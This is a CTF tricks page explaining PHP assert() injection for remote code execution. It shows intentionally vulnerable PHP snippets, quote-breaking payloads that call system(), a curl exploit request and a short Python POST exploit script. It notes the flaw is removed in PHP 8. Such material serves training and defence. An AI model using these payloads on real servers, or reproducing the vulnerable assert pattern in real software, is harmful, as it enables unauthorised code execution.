> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/rce/trick-0216.md).

# PHP Assert Injection RCE

***

Exploit a vulnerability where user input is evaluated directly within a PHP `assert()` function. This vulnerability arises because, when the first argument to `assert()` is a string, it is evaluated as PHP code. Craft input using logical operators (`and`, `or`) and functions like `die()` or `system()` to execute arbitrary code. A common payload structure like `' and die(system("<command>")) or '` can break out of the intended assertion logic, potentially bypassing filters if the input is expected within quotes inside the `assert()` call.

A simple example of vulnerable code is:

```php
<?php assert($_GET['code']); ?>
```

In such cases, providing input like `?code=phpinfo()` or `?code=system('id')` could execute the respective PHP functions directly.

As demonstrated, logical operators can be used to inject commands while maintaining the structure expected by the `assert()` call, such as `assert("1 == 2 || phpinfo()");`.

The original `curl` example uses this injection method:

```bash
curl "http://192.168.170.94/index.php?page=%27%20and%20die(system(%22id%22))%20or%20%27"
```

Exploitation can also target applications using `assert()` with POST data. Consider a script like:

```php
<?php assert($_POST['cmd']); ?>
```

This can be exploited using a tool or script to send a POST request. A Python example targeting this vulnerability might look like this:

```python
import requests

url = "http://target/assert.php"
data = {'cmd': "system('ls -l');"}
r = requests.post(url, data=data)
print(r.text)
```

It is important to note that passing a string as the first argument to `assert()` has been deprecated since PHP 7.2.0 and removed entirely in PHP 8.0.0, mitigating this specific vulnerability in modern PHP applications.
